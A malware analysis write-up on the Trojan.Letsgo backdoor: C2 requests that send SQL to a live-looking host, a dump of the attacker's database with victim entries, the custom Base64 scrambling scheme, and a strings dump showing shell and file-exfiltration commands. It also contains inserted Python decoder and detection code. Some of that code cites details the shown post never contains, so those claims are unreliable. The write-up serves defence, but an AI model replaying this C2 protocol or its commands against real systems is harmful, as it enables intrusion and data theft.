File Size:  33829 bytes
MD5:        052ec04866e4a67f31845d656531830d
SHA1:       9860de85ea0d2b3022fa3d7bbbee0a13796258e6
PE Time:    0x4CD24D8F [Thu Nov 04 06:07:11 2010 UTC]
AV:         2/42 (4.8%) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.49     6d5424af08903e9dcbd5b13956a9b58f
 .rdata    4.81     30d656a769947083207e04b46e74ceeb
 .data     4.93     7b331c3c724735e68e78b9e0680137a3
 .rsrc     2.88     23ee7cf17663c0aed3a2be7c0c89e237

Trojan.Letsgo Behavior

  • This Trojan creates a mutex named: letusgohtppmmv2.0.0.1
  • This Trojan is similar to another sample I have seen and will probably post an analysis for in the near future. The other sample creates a mutex named: letusgozrmmv0.9 that parses instructions in HTML files within <yahoo sb= … </yahoo> tags.
  • Both samples use the same encode/decode algorithm to derive a custom Base64 alphabet for communication.
  • The strings within update.exe give you a very good idea of the functionality that this Trojan supports, as well as the communication protocol. I will dump the strings of this file at the end of this post.
  • This Trojan issues SQL queries to a web form (http://202.105.39.39/safe/1.asp) that acts as an interface to a database file (http://202.105.39.39/safe/1.mdb)
  • When this Trojan is first executed it sends a SQL query to the database to see if it has already been registered there. If not, it will send a request to do so. Here is an example of this second type of request:
GET /safe/1.asp?rands=XJOTLVALQF&acc=vy&str=insert%20into%20tab_online%20
 (mode,clientname,clientip,accessip,onlinetime,lasttime,regcode)%20values%20
 ('0','victim','192.168.1.12','145.42.112.19','2011-06-08%2013:45:54',
 '2011-06-08%2013:45:54','NMQVPTXFBH') HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN
  • After the victim is successfully registered, it sends queries to the database for messages for its ID (in this case the assigned ID of the victim is 198)
GET /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str=select%20top%201%20*%20
 from%20tab_message%20where%20toid%20=%20'198'%20order%20by%20id%20asc HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN
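Two pieces of the behaviour described above, as one added Python example (mine, not code from the post or from either sample): decoding the stage-1 instruction hidden in an HTML comment, which the post shows decoding to `d:202.105.39.39 update.gif`, and flagging proxy-log lines that carry SQL statements against the `tab_*` tables in a GET query string, as the two requests above do. The comment format `<!-- base64 -->` is an assumption (the post shows only the decoded text), the log format is a constructed tab-separated layout, and the sample page and log lines are constructed from values in the post.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# --- (a) Stage-1 tasking: an HTML comment whose body is Base64 ----------------------
# Assumption: the tag looks like <!-- <base64> -->; the post only shows the decoded text.
COMMENT_RE = re.compile(r"<!--\s*([A-Za-z0-9+/=]+)\s*-->")


def decode_instruction(html: str):
    """Return (verb, download_url_or_None, decoded_text) for the first Base64 comment."""
    m = COMMENT_RE.search(html)
    if not m:
        return None
    text = base64.b64decode(m.group(1)).decode("ascii", "replace")
    verb, _, rest = text.partition(":")
    if verb == "d" and " " in rest:             # "d:<host> <file>" -> http://<host>/<file>
        host, _, filename = rest.partition(" ")
        return verb, f"http://{host}/{filename}", text
    return verb, None, text                     # anything else (e.g. sleep) is left as-is


# --- (b) Stage-2 C2: SQL statements carried in a GET query string --------------------
# From the post: /safe/1.asp?rands=...&acc=...&str=<SQL against tab_online/tab_message>.
C2_SQL_RE = re.compile(
    r"\b(?:insert\s+into|select\s+top\s+\d+\s.*?\bfrom)\s+tab_(?:online|message|file)\b",
    re.IGNORECASE)
# Stage-1 beacon User-Agent seen in the post: lt-764-238+Windows+NT+5.171
BEACON_UA_RE = re.compile(r"^lt-\d+-\d+\+Windows\+NT\+")


def is_sql_over_get(url: str) -> bool:
    """True if an .asp request carries a tab_* SQL statement in its str= parameter."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".asp"):
        return False
    q = parse_qs(parts.query)                   # also undoes the %20 escaping
    if "str" not in q or "rands" not in q:
        return False
    return C2_SQL_RE.search(q["str"][0]) is not None


def scan_proxy_log(text: str):
    """Flag lines of a tab-separated proxy log: ts, src, method, url, user-agent."""
    hits = []
    for line in text.splitlines():
        ts, src, method, url, ua = line.split("\t")
        reasons = []
        if is_sql_over_get(url):
            reasons.append("SQL statement in GET query to .asp page")
        if BEACON_UA_RE.match(ua):
            reasons.append("stage-1 beacon User-Agent")
        if reasons:
            hits.append((ts, src, url, reasons))
    return hits


# Constructed sample data (not captured traffic), built from values in the post.
SAMPLE_PAGE = "<html><!-- {} --></html>".format(
    base64.b64encode(b"d:202.105.39.39 update.gif").decode("ascii"))

SAMPLE_LOG = "\n".join([
    "2011-06-08T00:42:37Z\t192.168.1.12\tGET\thttp://122.147.13.8/new/iistart.html"
    "\tlt-764-238+Windows+NT+5.171",
    "2011-06-08T13:45:54Z\t192.168.1.12\tGET\thttp://202.105.39.39/safe/1.asp?rands=XJOTLVALQF&acc=vy"
    "&str=insert%20into%20tab_online%20(mode,clientname)%20values%20('0','victim')"
    "\tMozilla/4.0 (compatible; )",
    "2011-06-08T13:46:10Z\t192.168.1.12\tGET\thttp://202.105.39.39/safe/1.asp?rands=DWLLOXLGLH&acc=vy"
    "&str=select%20top%201%20*%20from%20tab_message%20where%20toid%20=%20'198'"
    "\tMozilla/4.0 (compatible; )",
    "2011-06-08T13:47:00Z\t192.168.1.30\tGET\thttp://intranet.example/reports/1.asp?id=5&str=hello"
    "\tMozilla/5.0",
])

if __name__ == "__main__":
    print(decode_instruction(SAMPLE_PAGE))
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The SQL check keys on the statement shape rather than on the host 202.105.39.39, so it keeps working when the same tooling is pointed at a different C2; the beacon User-Agent match is the weaker of the two indicators and is only useful in combination.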
  • Here is what the 1.asp page looks like:

  • At this time the database file 1.mdb is no longer available, therefore you get an error message. I managed to download a copy of the MDB file before it was taken offline.
  • The file consists of three tables:
    • TAB_FILE
    • TAB_MESSAGE
    • TAB_ONLINE
  • As mentioned, the table named TAB_ONLINE shows the systems that have been registered in the database:
TAB_ONLINE
 id   mode  clientname       clientip       accessip       onlinetime           lasttime             regcode
 190  1     MICROSOF-8E329D  192.168.0.115  223.166.4.246  2011-06-08 08:50:14  2011-06-08 08:50:14  SGZMMZJBMD
 191  0     isabella-272349  10.0.2.15      OMITTED        2011-06-08 03:45:46  2011-06-08 03:48:50  NHAPUXVYED
 192  0     home-off-d5f0ac  172.16.2.67    OMITTED        2011-06-07 23:38:31  2011-06-07 23:38:58  FEGCQGCSAR
 193  0     brbrb-d8fb22af1  10.14.23.2     OMITTED        2010-02-24 16:46:07  2010-02-24 16:46:34  FVZYWMWCJX
 194  0     BB-01-65         111.5.98.202   OMITTED        2011-06-08 12:37:31  2011-06-08 12:42:32  RHCYQSBCXD
 195  0     pc               172.16.0.1     OMITTED        2011-06-08 10:19:37  2011-06-08 10:19:55  CBHTKATMXA
  • I believe the first system on the list (IP 223.166.4.246 China) is the IP controlling the rest of the systems.
  • The TAB_MESSAGE table contains instructions that can be issued to the various victims, as well as messages from the victim to the C2 node with updates on the progress of tasks being performed. These instructions are Base64 encoded using a custom alphabet that is scrambled with each message (more on this later). The encodenum value determines how the alphabet is scrambled.
TAB_MESSAGE
 id    messageaction  fromid  toid  encodenum  messagetotallength  messagepiecelength  messagepieceindex  messagecontent                                            messagename
 1862  remove         204     205   14543      6                   6                   0                  qwrXCNGo                                                  remove
 1863  info           206     204   14517      42                  42                  0                  tCk1tFl1rPkUtCR2_Pl1RW_jK.Y8zlkRzlkRzlkRzlkRzlkRzlkRzlkR  info
 1864  info           206     204   14592      42                  42                  0                  0Zgr0zSr1fhF0ocRbfSrcHbXaLg79Shc9Shc9Shc9Shc9Shc9Shc9Shc  info
 1865  info           206     204   14651      42                  42                  0                  kSWdk6WdYS7ekJtjvSWdtGvPXbiU3W7t3W7t3W7t3W7t3W7t3W7t3W7t  info
 1866  info           206     204   14781      42                  42                  0                  kSVdk6WdYS7ekJtjvSWdtGvPXbiU3W7t3W7t3W7t3W7t3W7t3W7t3W7t  info
 1867  info           206     204   14866      42                  42                  0                  86QXg6ZXj5EMg2Ql85ZXQ78pGvK3NZEQNZEQNZEQNZEQNZEQNZEQNZEQ  info
 1868  info           206     204   14912      42                  42                  0                  pQVSvQUSw3V1vjMrp3USMCpo7ckA4UVM4UVM4UVM4UVM4UVM4UVM4UVM  info
  • Finally, the TAB_FILE table contains several files that the attacker can instruct the victims to download. Furthermore, this table will also contain the data of files being exfiltrated from victim systems.
  • These files are again Base64 encoded using a custom alphabet that is scrambled for each chunk of data by the encodenum value.
  • When I downloaded this database file, I noticed the messages above (info), which when decoded indicated to me that an 80 MB file was being uploaded to the database.
  • TAB_FILE confirmed this, showing that a file named qb.rar was being uploaded, as shown below:

  • As you can see, filepieceindex keeps track of the chunks of a file that is too large to be stored in a single row and has to be split.
  • After decoding the qb.rar file, I found out that it was password protected and the content was encrypted.
  • In an attempt to recover the password (since the command to create the RAR archive would have been sent as a message), I decoded all the available messages, but this process did not yield the password, since at this point the command was already executed, and the message had been deleted.
  • So, I started digging around the database file for deleted but not overwritten messages. Unfortunately, none of the messages I recovered were the command that created the RAR archive.
  • I did, however, confirm that the attacker had compromised and interacted with at least two systems of a law firm and at least one system of a pro-democracy organization.
  • One of the messages I recovered from the system of the pro-democracy organization showed that the attacker had executed the ipconfig /all command on that system:
ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : OMITTED
Primary Dns Suffix  . . . . . . . : OMITTED
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : OMITTED

Ethernet adapter Wireless Network Connection:

        Media State . . . . . . . . . . . : Media disconnected
        Description . . . . . . . . . . . : Dell Wireless 1397 WLAN Mini-Card
        Physical Address. . . . . . . . . : 00-25-56-10-EB-7A

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : OMITTED
        Description . . . . . . . . . . . : Intel(R) 82567LM Gigabit Network Connection
        Physical Address. . . . . . . . . : 00-24-E8-A3-F0-27
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 10.10.5.200
        Subnet Mask . . . . . . . . . . . : 255.0.0.0
        Default Gateway . . . . . . . . . : 10.10.10.1
        DHCP Server . . . . . . . . . . . : 10.10.10.62
        DNS Servers . . . . . . . . . . . : 10.10.10.62
                                            10.10.11.51
        Lease Obtained. . . . . . . . . . : Tuesday, June 07, 2011 9:24:12 AM
        Lease Expires . . . . . . . . . . : Thursday, June 09, 2011 9:24:12 AM
C:\Documents and Settings\OMITTED\Application Data\Adobe>

Encoding Algorithm

  • As I mentioned above, Trojan.Letsgo uses Base64 encoding with a custom alphabet for its network communication.
  • This algorithm starts with a custom base alphabet that is further scrambled by a scrambling algorithm.
  • The custom base alphabet is actually 65 bytes long and is shown below:
ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba-_.
  • The other sample of this Trojan (the one that creates the mutex letusgozrmmv0.9) has a slightly different base alphabet:
ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba@#|
  • The scrambling algorithm consists of these steps (alphabetBuff holds the 65-byte base alphabet, encodenum is the per-message value stored in the table):
for (i = 0; i < 65; i++) {
  var1 = encodenum MOD 65          // which intArray entry to consult
  var2 = intArray[var1] MOD 65     // swap partner for position i
  var3 = alphabetBuff[var2]        // swap alphabetBuff[i] and alphabetBuff[var2]
  alphabetBuff[var2] = alphabetBuff[i]
  alphabetBuff[i] = var3
  encodenum++                      // consecutive positions walk through intArray
}
  • The intArray mentioned above is an array of integers that is calculated at runtime; the values are the decimal digits of pi taken four at a time, with leading zeros dropped (3141, 5926, 5358, ...). Both samples of this Trojan produce the same integers, so I am listing them (only the first 65) here:
@intArray = ("3141", "5926", "5358", "9793", "2384", "6264", "3383",
             "2795", "288", "4197", "1693", "9937", "5105", "8209",
             "7494", "4592", "3078", "1640", "6286", "2089", "9862",
             "8034", "8253", "4211", "7067", "9821", "4808", "6513",
             "2823", "664", "7093", "8446", "955", "582", "2317", "2535",
             "9408", "1284", "8111", "7450", "2841", "270", "1938", "5211",
             "555", "9644", "6229", "4895", "4930", "3819", "6442", "8810",
             "9756", "6593", "3446", "1284", "7564", "8233", "7867", "8316",
             "5271", "2019", "914", "5648", "5669");
  • After the alphabet is scrambled by this algorithm, only the first 64 bytes are used for encoding/decoding (it is Base64 after all). Starting with 65 bytes means one character is dropped from each scrambled alphabet, which adds a bit more variation.
  • So, to give an example of this, let's look at the first info message from TAB_MESSAGE above.
    • We have the following encoded message: tCk1tFl1rPkUtCR2_Pl1RW_jK.Y8zlkRzlkRzlkRzlkRzlkRzlkRzlkR
    • We also have its encodenum value: 14517.
  • So, we first produce the scrambled alphabet:
    • From the base alphabet: ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba-_.
    • Scrambled with encodenum 14517 (first 64 bytes): l3zFIMxWROGrt_NbYvpCA60cSigKJD7Lk8h9oj5.wduHX4yV1TUPQ2esqfnBm-aE
  • After Base64 decoding the message using the scrambled custom alphabet we get 42 bytes (matching messagetotallength): 21 bytes of status text followed by 21 bytes of 0x08 filler:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   31 38 30 30 30 30 2F 38  32 31 32 35 37 30 30 20   180000/82125700
00000010   73 65 6E 74 21 08 08 08  08 08 08 08 08 08 08 08   sent!
00000020   08 08 08 08 08 08 08 08  08 08
  • As I mentioned before, when I saw this I knew a file was being transferred and the victim was updating the C2 node on the progress of the transfer.
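The scrambling loop and the custom-alphabet Base64 step above, reimplemented in Python as an added example (this is not the author's script and not code lifted from the Trojan). The intArray values and both base alphabets are copied from the page; function names and the encoder's handling of a trailing partial group are mine. The rows embedded at the bottom are the TAB_MESSAGE entries from the dump above, so the module decodes the whole table offline:

```python
"""Trojan.Letsgo alphabet scrambler and custom-alphabet Base64 codec.

Added example: a Python reimplementation of the scrambling loop described
above. Not the author's script and not code from the Trojan. Function names
are mine; INT_ARRAY and the two base alphabets are copied from the page. The
65 integers are the decimal digits of pi taken four at a time with leading
zeros dropped (3141 5926 5358 ... 5669), which is why both samples compute
the same table at runtime.
"""

BASE_ALPHABET_HTTP = "ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba-_."
BASE_ALPHABET_MUTEX = "ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba@#|"

INT_ARRAY = [
    3141, 5926, 5358, 9793, 2384, 6264, 3383, 2795, 288, 4197, 1693, 9937,
    5105, 8209, 7494, 4592, 3078, 1640, 6286, 2089, 9862, 8034, 8253, 4211,
    7067, 9821, 4808, 6513, 2823, 664, 7093, 8446, 955, 582, 2317, 2535,
    9408, 1284, 8111, 7450, 2841, 270, 1938, 5211, 555, 9644, 6229, 4895,
    4930, 3819, 6442, 8810, 9756, 6593, 3446, 1284, 7564, 8233, 7867, 8316,
    5271, 2019, 914, 5648, 5669,
]


def scramble_alphabet(base: str, encodenum: int) -> str:
    """One swap pass over the 65-byte alphabet, driven by intArray and the
    per-message encodenum; only the first 64 characters are used."""
    if len(base) != 65:
        raise ValueError("base alphabet must be 65 characters")
    buf = list(base)
    for i in range(65):
        var1 = encodenum % 65          # which intArray entry to consult
        var2 = INT_ARRAY[var1] % 65    # swap partner for position i
        buf[i], buf[var2] = buf[var2], buf[i]
        encodenum += 1
    return "".join(buf[:64])


def decode_message(content: str, encodenum: int, base: str = BASE_ALPHABET_HTTP) -> bytes:
    """Base64-decode with the scrambled alphabet. The stored messages carry
    no '=' padding, so leftover bits (fewer than 8) at the end are dropped."""
    index = {c: i for i, c in enumerate(scramble_alphabet(base, encodenum))}
    out = bytearray()
    acc = bits = 0
    for ch in content:
        if ch not in index:
            raise ValueError(f"{ch!r} not in alphabet for encodenum {encodenum}")
        acc = (acc << 6) | index[ch]
        bits += 6
        if bits >= 8:
            bits -= 8
            out.append((acc >> bits) & 0xFF)
            acc &= (1 << bits) - 1
    return bytes(out)


def encode_message(data: bytes, encodenum: int, base: str = BASE_ALPHABET_HTTP) -> str:
    """Inverse of decode_message. Emitting a final partial 6-bit group for
    inputs whose length is not a multiple of 3 is an assumption; the rows on
    the page are all multiples of 3 and show no padding character."""
    alphabet = scramble_alphabet(base, encodenum)
    out = []
    acc = bits = 0
    for b in data:
        acc = (acc << 8) | b
        bits += 8
        while bits >= 6:
            bits -= 6
            out.append(alphabet[(acc >> bits) & 0x3F])
            acc &= (1 << bits) - 1
    if bits:
        out.append(alphabet[(acc << (6 - bits)) & 0x3F])
    return "".join(out)


# (id, messageaction, encodenum, messagecontent) copied from the TAB_MESSAGE dump above.
TAB_MESSAGE_ROWS = [
    (1862, "remove", 14543, "qwrXCNGo"),
    (1863, "info", 14517, "tCk1tFl1rPkUtCR2_Pl1RW_jK.Y8zlkRzlkRzlkRzlkRzlkRzlkRzlkR"),
    (1864, "info", 14592, "0Zgr0zSr1fhF0ocRbfSrcHbXaLg79Shc9Shc9Shc9Shc9Shc9Shc9Shc"),
    (1865, "info", 14651, "kSWdk6WdYS7ekJtjvSWdtGvPXbiU3W7t3W7t3W7t3W7t3W7t3W7t3W7t"),
    (1866, "info", 14781, "kSVdk6WdYS7ekJtjvSWdtGvPXbiU3W7t3W7t3W7t3W7t3W7t3W7t3W7t"),
    (1867, "info", 14866, "86QXg6ZXj5EMg2Ql85ZXQ78pGvK3NZEQNZEQNZEQNZEQNZEQNZEQNZEQ"),
    (1868, "info", 14912, "pQVSvQUSw3V1vjMrp3USMCpo7ckA4UVM4UVM4UVM4UVM4UVM4UVM4UVM"),
]


def decode_table(rows=TAB_MESSAGE_ROWS) -> dict:
    """Decode every row; the 0x08 filler that follows the text in the hex
    dump above is stripped so the status strings read cleanly."""
    return {
        row_id: decode_message(content, encodenum).rstrip(b"\x08")
        for row_id, _action, encodenum, content in rows
    }


if __name__ == "__main__":
    for row_id, plain in decode_table().items():
        print(row_id, plain)
```

Running the module decodes all seven rows: id 1862 (messageaction remove, messagetotallength 6) decodes to the six bytes remove, and id 1863 reproduces the hex dump above, 21 bytes of status text followed by 21 bytes of 0x08. Because the scramble depends only on intArray and the encodenum stored next to each row, anyone holding a copy of the database can decode it offline; the scheme is obfuscation, not confidentiality.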
  • As promised, here is a string dump from update.exe:
Text strings referenced in update:.text
Address      Disassembly                   Text string
00401018     MOV EDI, update.00408020      ASCII "Content-Type: application/x-www-form-urlencoded"
00401402     PUSH update.0040805C          ASCII "https"
0040144B     PUSH update.00408054          ASCII "http"
00401568     PUSH update.00408064          ASCII "Mozilla/4.0 (compatible; )"
00401628     MOV DWORD PTR SS:[ESP+1C], u  ASCII "*/*"
0040168E     PUSH update.00408094          ASCII "HTTP/1.0"
00401694     PUSH update.00408090          ASCII "GET"
004016B6     MOV EDI, update.00408080      ASCII "Accept: */*"
004016CB     PUSH update.00408080          ASCII "Accept: */*"
004017D8     MOV DWORD PTR SS:[ESP+1C], u  ASCII "*/*"
00401854     PUSH update.00408094          ASCII "HTTP/1.0"
0040185D     PUSH update.004080A4          ASCII "POST"
0040187F     MOV EDI, update.00408080      ASCII "Accept: */*"
0040189A     PUSH update.00408080          ASCII "Accept: */*"
004019CF     MOV DWORD PTR SS:[ESP+20], u  ASCII "*/*"
00401A58     PUSH update.00408094          ASCII "HTTP/1.0"
00401A5E     PUSH update.004080A4          ASCII "POST"
00401A80     MOV EDI, update.00408080      ASCII "Accept: */*"
00401A95     PUSH update.00408080          ASCII "Accept: */*"
00401B1F     PUSH update.004080AC          ASCII "Content-Length: %d"
00401E52     PUSH update.004080D0          ASCII "%d:%s %d    "
00401F8D     PUSH update.004080DC          ASCII 0A,"     Execu"
0040216B     PUSH update.00408100          ASCII "USERPROFILE"
00402179     PUSH update.004080F8          ASCII "windir"
0040225B     PUSH update.00408124          ASCII "%s\"
00402262     MOV EDI, update.0040811C      ASCII "\*.*"
00402336     PUSH update.00408114          ASCII "%s\%s"
00402369     PUSH update.0040810C          ASCII "%s\%s"
0040246E     PUSH update.00408190          ASCII "InternetQueryOption failed! (%d)"
00402481     PUSH update.0040818C          ASCII "%s"
004024A2     PUSH update.0040816C          ASCII "PROXY_TYPE_AUTO_PROXY_URL:%s"
004024C1     PUSH update.00408154          ASCII "PROXY_TYPE_AUTO_DETECT"
004024DC     PUSH update.00408140          ASCII "PROXY_TYPE_PROXY:%s"
004024F8     PUSH update.0040812C          ASCII "PROXY_TYPE_DIRECT"
004025EF     MOV EDI, update.004081C0      ASCII "\cmd.exe"
00402627     MOV EDI, update.004081B4      ASCII "rusinfo.exe"
00402776     PUSH update.004081E0          ASCII "w+t"
0040277B     PUSH update.004081D8          ASCII "CONOUT$"
00402789     PUSH update.004081D4          ASCII "r+t"
0040278E     PUSH update.004081CC          ASCII "CONIN$"
004027E1     PUSH update.004081F4          ASCII "/c del "
00402809     PUSH update.004081EC          ASCII " >> NUL"
0040281B     PUSH update.004081E4          ASCII "ComSpec"
00402AAA     PUSH update.00408204          ASCII "%.4d"
00402F0E     PUSH update.004082A0          ASCII "AAAAA"
00402F13     PUSH update.00408274          ASCII "http://202.105.39.39/safe/1.asp"
00402F29     PUSH update.0040825C          ASCII "letusgohtppmmv2.0.0.1"
00402F84     MOV ESI, update.00408258      ASCII "-c"
00402FE6     PUSH update.00408228          ASCII "Are you sure to FORMAT Disk C With NTFS?(Y/N)"
00403003     PUSH update.00408220          ASCII "%[^]"
00403011     MOV ESI, update.0040821C      ASCII "yes"
004030CB     PUSH update.00408214          ASCII "exit"
0040312F     PUSH update.00408314          ASCII "%Y/%m/%d %X %z"
004031B4     PUSH update.0040830C          ASCII "mname"
004031BE     PUSH update.00408304          ASCII "shell"
0040328C     MOV ESI, update.00408304      ASCII "shell"
0040333C     MOV EDI, update.00408300      ASCII ""
0040339E     MOV EDI, update.004082F8      ASCII "reshell"
00403432     MOV EDI, update.00408300      ASCII ""
00403492     MOV ESI, update.004082F0      ASCII "listp"
004034F8     PUSH update.0040830C          ASCII "mname"
00403520     PUSH update.004082E8          ASCII "info"
00403532     MOV ESI, update.004082E0      ASCII "killp"
00403592     MOV ESI, update.004082D8      ASCII "printf"
00403609     PUSH update.0040830C          ASCII "mname"
00403622     PUSH update.004082E8          ASCII "info"
0040362F     MOV ESI, update.004082D0      ASCII "runfile"
00403675     MOV ESI, update.004082C4      ASCII "filectos"
004036CB     MOV ESI, update.004082B8      ASCII "filestoc"
00403721     MOV ESI, update.004082B0      ASCII "remove"
00403767     MOV ESI, update.004082A8      ASCII "sleep"

00403AFF     PUSH update.0040865C          ASCII "select top 1 * from tab_file where filename='%s' order by id as
00403B8E     PUSH update.00408658          ASCII "rb+"
00403BA5     PUSH update.00408654          ASCII "wb+"
00403BE6     PUSH update.00408610          ASCII "select * from tab_file where filename='%s' and filepieceindex=%
00403CED     PUSH update.004085DC          ASCII 0A,"Down file "
00403D1C     PUSH update.004085D0          ASCII "net error!"
00403D59     PUSH update.004085B4          ASCII "piece %d not found error!"
00403D84     PUSH update.004085A0          ASCII "Cant open file!"
00403DD9     MOV EDI, update.00408718      ASCII "file"
00403DED     PUSH update.00408658          ASCII "rb+"
00403F07     PUSH update.004086D4          ASCII "select id from tab_file where filename='%s' and filepieceindex=
00403F30     PUSH update.00408498          ASCII ""
00403F35     PUSH update.0040847C          ASCII ""
00403F8A     PUSH update.004086A0          ASCII 0A,"Send file "
00403FAF     PUSH update.004085A0          ASCII "Cant open file!"
00403FDE     PUSH update.00408720          ASCII "%s"
00404009     PUSH update.004082E8          ASCII "info"
0040401E     PUSH update.004082E8          ASCII "info"
00404082     PUSH update.00408724          ASCII "select top 1 * from tab_message where toid = '%s' order by id a
00404172     PUSH update.00408768          ASCII "insert into tab_message (messageaction,fromid,toid,encodenum,me
0040420A     PUSH update.00408828          ASCII "insert into tab_file (encodenum,filetotallength,filepiecelength
00404280     PUSH update.00408720          ASCII "%s"
00404297     PUSH update.00408720          ASCII "%s"
004042AB     PUSH update.004088C0          ASCII "%d"
004042C2     PUSH update.004088C0          ASCII "%d"
004042D9     PUSH update.004088C0          ASCII "%d"
004042F8     PUSH update.00408720          ASCII "%s"
00404309     PUSH update.00408720          ASCII "%s"
00404360     PUSH update.004088C0          ASCII "%d"
00404494     PUSH update.004089C4          ASCII "%d-%02d-%02d %02d:%02d:%02d"
004044A8     PUSH update.00408984          ASCII "select id from tab_online where regcode = '%s' order by id asc"
004044D7     PUSH update.00408498          ASCII ""
004044DC     PUSH update.0040847C          ASCII ""
00404517     PUSH update.00408984          ASCII "select id from tab_online where regcode = '%s' order by id asc"
00404566     PUSH update.00408900          ASCII "insert into tab_online (mode,clientname,clientip,accessip,onlin
004045A1     PUSH update.00408984          ASCII "select id from tab_online where regcode = '%s' order by id asc"
004045CB     PUSH update.00408498          ASCII ""
004045D0     PUSH update.0040847C          ASCII ""
00404655     PUSH update.004088C4          ASCII "update tab_online set lasttime = '%s' where regcode = '%s'"
00404728     PUSH update.00408A10          ASCII "rands=%s&acc=%s&str=%s"
00404761     PUSH update.00408274          ASCII "http://202.105.39.39/safe/1.asp"
00404766     PUSH update.00408A08          ASCII "%s?%s"
004047A4     PUSH update.004089E8          ASCII "id="param1" size="100" value=""
004047BA     MOV ESI, update.004089E0      ASCII "acc ok"
004048D6     PUSH update.00408274          ASCII "http://202.105.39.39/safe/1.asp"
004048E1     PUSH update.00408A30          ASCII "%s?rands=%s&acc=%s"
004048F3     PUSH update.00408A28          ASCII "str=%s"
0040495F     PUSH update.004089E8          ASCII "id="param1" size="100" value=""
00404975     MOV ESI, update.004089E0      ASCII "acc ok"
00404A7D     MOV EDI, update.00408274      ASCII "http://202.105.39.39/safe/1.asp"
00404AC7     MOV EDI, update.00408A6C      ASCII "?rands="
00404B57     PUSH update.00408A58          ASCII "id="param4" value=""
00404B73     PUSH update.00408A44          ASCII "id="param5" value=""
00404EC5     PUSH update.00408BF8          ASCII "select * from tab_online where id=%s"
00404EDA     PUSH update.00408BCC          ASCII "select * from tab_online order by id asc"
00404F1F     PUSH update.00408498          ASCII ""
00404F24     PUSH update.0040847C          ASCII ""
00404F45     PUSH update.00408BC4          ASCII "id:%s"
00404F51     PUSH update.00408BC0          ASCII "%s    "
00404F60     PUSH update.00408498          ASCII ""
00404F65     PUSH update.00408BA4          ASCII ""
00404F86     PUSH update.00408B98          ASCII "mode:%s"
00404F92     PUSH update.00408BC0          ASCII "%s    "
00404FA1     PUSH update.00408498          ASCII ""
00404FA6     PUSH update.00408B74          ASCII ""
00404FC7     PUSH update.00408B64          ASCII "clientname:%s"
00404FD6     PUSH update.00408498          ASCII ""
00404FDB     PUSH update.00408B44          ASCII ""
00404FF8     PUSH update.00408B34          ASCII "clientip:%s"
00405007     PUSH update.00408498          ASCII ""
0040500C     PUSH update.00408B14          ASCII ""
0040502D     PUSH update.00408B04          ASCII "accessip:%s"
00405039     PUSH update.00408BC0          ASCII "%s    "
00405045     PUSH update.00408BC0          ASCII "%s    "
00405054     PUSH update.00408498          ASCII ""
00405059     PUSH update.00408AE0          ASCII ""
0040507A     PUSH update.00408AD0          ASCII "onlinetime:%s"
00405089     PUSH update.00408498          ASCII ""
0040508E     PUSH update.00408AB0          ASCII ""
004050A7     PUSH update.00408AA0          ASCII "lasttime:%s"
004050B3     PUSH update.00408498          ASCII ""
004050B8     PUSH update.00408A80          ASCII ""
004050D1     PUSH update.00408A74          ASCII "regcode:%s"
004050E5     PUSH update.0040818C          ASCII "%s"
00405171     PUSH update.00408C44          ASCII "delete from tab_online"
00405187     PUSH update.00408C20          ASCII "delete from tab_online where id=%s"
00405221     PUSH update.00408C80          ASCII "delete from tab_message"
00405237     PUSH update.00408C5C          ASCII "delete from tab_message where id=%s"
004052D1     PUSH update.00408CC4          ASCII "delete from tab_file"
004052E7     PUSH update.00408C98          ASCII "delete from tab_file where filename='%s'"
00405355     PUSH update.00408DA4          ASCII "select * from tab_message where id=%s"
0040536A     PUSH update.00408D78          ASCII "select * from tab_message order by id asc"
004053C1     PUSH update.00408498          ASCII ""
004053C6     PUSH update.0040847C          ASCII ""
004053E7     PUSH update.00408BC4          ASCII "id:%s"
004053F3     PUSH update.00408BC0          ASCII "%s    "
00405402     PUSH update.00408498          ASCII ""
00405407     PUSH update.00408454          ASCII ""
00405428     PUSH update.00408D64          ASCII "messageaction:%s"
00405434     PUSH update.00408BC0          ASCII "%s    "
00405443     PUSH update.00408498          ASCII ""
00405448     PUSH update.00408434          ASCII ""
00405469     PUSH update.00408D58          ASCII "fromid:%s"
00405475     PUSH update.00408D50          ASCII "%s->"
00405484     PUSH update.00408498          ASCII ""
00405489     PUSH update.00408418          ASCII ""
004054AE     PUSH update.00408D44          ASCII "toid:%s"
004054BD     PUSH update.00408498          ASCII ""
004054C2     PUSH update.004083F4          ASCII ""
004054DF     PUSH update.00408D34          ASCII "encodenum:%s"
004054F8     PUSH update.00408498          ASCII ""
004054FD     PUSH update.004083C8          ASCII ""
0040551A     PUSH update.00408D1C          ASCII "messagetotallength:%s"
00405526     PUSH update.00408498          ASCII ""
0040552B     PUSH update.0040839C          ASCII ""
00405548     PUSH update.00408D04          ASCII "messagepiecelength:%s"
00405557     PUSH update.00408498          ASCII ""
0040555C     PUSH update.00408370          ASCII ""
00405579     PUSH update.00408CEC          ASCII "messagepieceindex:%s"
